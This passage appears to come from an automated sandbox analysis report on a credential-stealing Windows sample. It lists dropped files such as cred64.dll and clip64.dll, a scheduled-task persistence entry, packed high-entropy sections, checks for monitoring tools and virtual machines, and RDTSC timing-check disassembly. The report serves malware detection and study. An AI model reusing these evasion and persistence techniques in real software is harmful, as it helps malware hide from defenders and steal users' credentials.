                                Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static file information: File size 3010048 > 1048576
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: Raw size of qatcqnjl is bigger than: 0x100000 < 0x2aca00
                                Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64[1].dll.6.dr, cred64.dll.6.dr

                                Data Obfuscation

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 1.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 2.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 6.2.explorha.exe.860000.0.unpack :EW;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qatcqnjl:EW;zabsvnpb:EW;.taggant:EW;
                                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: real checksum: 0x2e742d should be: 0x2e4b35
                                Source: cred64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
                                Source: explorha.exe.0.dr Static PE information: real checksum: 0x2e742d should be: 0x2e4b35
                                Source: clip64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
                                Source: clip64[1].dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1f783
                                Source: cred64.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name:
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .idata
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: qatcqnjl
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: zabsvnpb
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .taggant
                                Source: explorha.exe.0.dr Static PE information: section name:
                                Source: explorha.exe.0.dr Static PE information: section name: .idata
                                Source: explorha.exe.0.dr Static PE information: section name: qatcqnjl
                                Source: explorha.exe.0.dr Static PE information: section name: zabsvnpb
                                Source: explorha.exe.0.dr Static PE information: section name: .taggant
                                Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
                                Source: cred64.dll.6.dr Static PE information: section name: _RDATA
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E229A0 push esp; ret 0_2_00E229A1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E19420 push ebx; ret 0_2_00E1942A
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E18DE6 push esi; iretd 0_2_00E18DE7
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E2EFBC push ecx; ret 0_2_00E2EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0086C0E8 push cs; retn 0002h 1_2_0086C0E9
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00869420 push ebx; ret 1_2_0086942A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00868DE6 push esi; iretd 1_2_00868DE7
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0087EFBC push ecx; ret 1_2_0087EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0086C0E8 push cs; retn 0002h 2_2_0086C0E9
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00869420 push ebx; ret 2_2_0086942A
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00868DE6 push esi; iretd 2_2_00868DE7
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0087EFBC push ecx; ret 2_2_0087EFCF
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0089F4FB push ss; iretd 6_2_0089F4FC
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087F666 push ecx; ret 6_2_0087F679
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087EFBC push ecx; ret 6_2_0087EFCF
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: entropy: 7.982348024472177
                                Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.982348024472177
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll

                                Boot Survival

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: FilemonClass
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: RegmonClass
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: Regmonclass
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Window searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Windows\Tasks\explorha.job

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-10389
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_1-10522
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10228A7 second address: 1022936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F449CC63D7Bh 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D3D40h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F449CC63D78h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jmp 00007F449CC63D7Ch 0x00000037 mov esi, dword ptr [ebp+122D3D94h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F449CC63D78h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xchg eax, ebx 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F449CC63D87h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023351 second address: 1023356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023BE3 second address: 1023BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023BE9 second address: 1023BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1024EE9 second address: 1024EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102DEE3 second address: 102DF6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F449CEB0738h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D3A40h], esi 0x0000002c mov dword ptr [ebp+1246D87Fh], edi 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F449CEB0738h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov bx, ax 0x00000054 xchg eax, esi 0x00000055 jng 00007F449CEB074Ah 0x0000005b push edx 0x0000005c jmp 00007F449CEB0742h 0x00000061 pop edx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push edx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102C1A7 second address: 102C220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, 07DDC089h 0x00000010 stc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, dword ptr [ebp+122D1DB8h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov edi, dword ptr [ebp+122D3C60h] 0x0000002b mov eax, dword ptr [ebp+122D102Dh] 0x00000031 jmp 00007F449CC63D88h 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F449CC63D78h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 nop 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102C220 second address: 102C22D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10300E8 second address: 10300ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 102F2C8 second address: 102F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1031274 second address: 10312A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D3BB4h] 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D3CB4h] 0x0000001b mov dword ptr [ebp+122D1D1Fh], edx 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D2A69h], eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10312A5 second address: 10312AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10312AA second address: 10312C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D82h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1030375 second address: 1030385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 103336A second address: 1033370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
